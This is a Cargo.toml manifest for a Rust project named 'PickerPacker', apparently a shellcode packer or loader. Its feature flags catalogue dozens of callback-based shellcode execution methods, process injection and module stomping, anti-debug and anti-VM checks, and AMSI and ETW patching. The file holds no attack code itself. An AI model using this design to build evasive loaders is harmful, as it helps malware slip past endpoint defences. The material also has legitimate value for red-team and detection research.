[package]
name = "PickerPacker"
version = "0.1.0"
authors = ["Leek0gg"]
edition = "2024"

[profile.release]
opt-level = "z"     # Optimize for size.
lto = "fat"         # Aggressive Link Time Optimization
codegen-units = 1   # Reduce number of codegen units to increase optimizations.
panic = "abort"     # Abort on panic
strip = true        # Automatically strip symbols from the binary.

[dependencies]
rust_syscalls = { git = "https://github.com/janoglezcampos/rust_syscalls", features = ["_INDIRECT_"], optional = true }
rand = "0.8"
sysinfo = { version = "0.32", optional = true }
ntapi = { version = "0.4", optional = true }
wmi = { version = "0.13", optional = true }

[build-dependencies]
cc = { version = "1.0", optional = true }

[dependencies.windows-sys]
version = "0.59"
optional = true
features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_Globalization",
    "Win32_System_LibraryLoader",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_StationsAndDesktops",
    "Win32_Security_Cryptography",
    "Win32_Graphics_Gdi",
    "Win32_Storage_FileSystem",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_SystemServices",
    "Win32_UI_Input_Ime",
    "Win32_System_ProcessStatus",
    "Win32_System_Power",
    "Win32_System_Memory",
    "Win32_System_Com",
    "Win32_UI_Shell",
    "Win32_NetworkManagement_NetManagement",
    "Win32_NetworkManagement_IpHelper",
    "Win32_System_SystemInformation",
    "Win32_System_Registry",
    "Win32_System_Kernel",
    "Win32_System_WindowsProgramming",
]

[features]
ShellcodeExecuteDefault = []
ShellcodeExecuteFiber = ["windows-sys"]
ShellcodeExecuteCreateTimerQueueTimer = ["windows-sys"]
ShellcodeExecuteEnumUILanguages = ["windows-sys"]
ShellcodeExecuteVerifierEnumerate = ["windows-sys"]
ShellcodeExecuteEnumChildWindows = ["windows-sys"]
ShellcodeExecuteEnumDesktopWindows = ["windows-sys"]
ShellcodeExecuteEnumSystemLocales = ["windows-sys"]
ShellcodeExecuteCertEnumSystemStoreLocation = ["windows-sys"]
ShellcodeExecuteEnumWindowStations = ["windows-sys"]
ShellcodeExecuteEnumDisplayMonitors = ["windows-sys"]
ShellcodeExecuteImageGetDigestStream = ["windows-sys"]
ShellcodeExecuteCertEnumSystemStore = ["windows-sys"]
ShellcodeExecuteEnumTimeFormats = ["windows-sys"]
ShellcodeExecuteCryptEnumOIDInfo = ["windows-sys"]
ShellcodeExecuteImmEnumInputContext = ["windows-sys"]
ShellcodeExecuteEnumPropsW = ["windows-sys"]
ShellcodeExecuteEnumLanguageGroupLocalesW = ["windows-sys"]
ShellcodeExecuteSymEnumProcesses = ["windows-sys"]
ShellcodeExecuteCopyFileExW = ["windows-sys"]
ShellcodeExecuteEnumObjects = ["windows-sys"]
ShellcodeExecuteEnumResourceTypesW = ["windows-sys"]
ShellcodeExecuteEnumPageFilesW = ["windows-sys"]
ShellcodeExecuteEnumDirTreeW = ["windows-sys"]
ShellcodeExecuteEnumFontFamiliesW = ["windows-sys"]
ShellcodeExecuteEnumDesktopsW = ["windows-sys"]
ShellcodeExecuteInitOnceExecuteOnce = ["windows-sys"]
ShellcodeExecuteEnumThreadWindows = ["windows-sys"]
ShellcodeExecuteEnumerateLoadedModulesW64 = ["windows-sys"]
ShellcodeExecuteEnumFontsW = ["windows-sys"]
ShellcodeExecuteEnumCalendarInfoW = ["windows-sys"]
ShellcodeExecuteEnumWindows = ["windows-sys"]
ShellcodeExecuteEnumPwrSchemes = ["windows-sys"]
ShellcodeExecuteSymFindFileInPath = ["windows-sys"]
ShellcodeExecuteFlsAlloc = ["windows-sys"]
ShellcodeExecuteWaitForMultipleObjectsExAPC = ["windows-sys", "rust_syscalls"]
ShellcodeExecuteMsgWaitForMultipleObjectsExAPC = ["windows-sys", "rust_syscalls"]
ShellcodeExecuteSleepExAPC = ["windows-sys", "rust_syscalls"]
ShellcodeExecuteWaitForSingleObjectExAPC = ["windows-sys", "rust_syscalls"]
ShellcodeExecuteSignalObjectAndWaitAPC = ["windows-sys", "rust_syscalls"]
ShellcodeExecuteEnumSystemGeoID = ["windows-sys"]
ShellcodeExecuteThreadpoolWait = ["windows-sys"]
ShellcodeExecuteCDefFolderMenu = ["windows-sys"]
default = []
InjectionDefaultLocal = ["rust_syscalls"]
InjectionMappingLocal = ["rust_syscalls"]
InjectionFunctionStomping = ["windows-sys", "rust_syscalls"]
InjectionModuleStomping = ["windows-sys", "rust_syscalls"]
TinyAES = ["cc"]
CTAES = ["cc"]
CheckAntiDebugProcessDebugFlags = ["windows-sys"]
CheckAntiDebugSystemDebugControl = ["windows-sys"]
CheckAntiDebugRemoteDebugger = ["windows-sys"]
CheckAntiDebugNtGlobalFlag = ["windows-sys"]
CheckAntiDebugProcessList = ["sysinfo", "windows-sys"]
CheckAntiDebugHardwareBreakpoints = ["windows-sys"]
CheckAntiVMCPU = ["windows-sys"]
CheckAntiVMRAM = ["windows-sys"]
CheckAntiVMUSB = ["windows-sys"]
CheckAntiVMProcesses = ["sysinfo", "windows-sys"]
CheckAntiVMHyperV = ["windows-sys"]
CheckAntiVMResolution = ["windows-sys"]
CheckAntiVMFan = ["wmi", "windows-sys"]
CheckAntiVMComprehensive = ["windows-sys"]
CheckAntiVMICMP = ["windows-sys"]
CheckDomainJoined = ["windows-sys"]
EvasionAMSISimplePatch = ["windows-sys", "rust_syscalls"]
EvasionAMSIHwbp = ["windows-sys"]
EvasionAMSIPageGuard = ["windows-sys"]
EvasionSelfDeletion = ["windows-sys"]
EvasionETWSimple = ["windows-sys", "rust_syscalls"]
EvasionETWWinAPI = ["windows-sys", "rust_syscalls"]
EvasionETWpEventWrite = ["windows-sys", "rust_syscalls"]
EvasionETWpEventWrite2 = ["windows-sys", "rust_syscalls"]
EvasionNtdllUnhooking = ["windows-sys", "ntapi"]
